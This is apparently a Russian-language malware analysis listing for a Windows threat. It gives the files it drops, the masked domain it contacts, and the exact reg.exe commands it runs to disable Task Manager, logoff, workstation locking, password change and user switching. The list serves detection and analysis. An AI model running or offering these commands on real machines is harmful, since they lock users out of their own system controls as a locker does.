Техническая информация
- скрытых файлов
- расширений файлов
- Диспетчера задач (Taskmgr)
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogoff' = '00000001'
- %WINDIR%\nircmd.exe
- %WINDIR%\disable.bat
- 't1.##umcdn.net':443
- 't1.##umcdn.net':443
- DNS ASK t1.##umcdn.net
- ClassName: 'Progman' WindowName: 'Program Manager'
- ClassName: 'Button' WindowName: 'Start'
- ClassName: '' WindowName: 'Start'
- '%WINDIR%\nircmd.exe' exec hide %WINDIR%\Disable.bat
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\Disable.bat' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\Disable.bat
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d "1" /f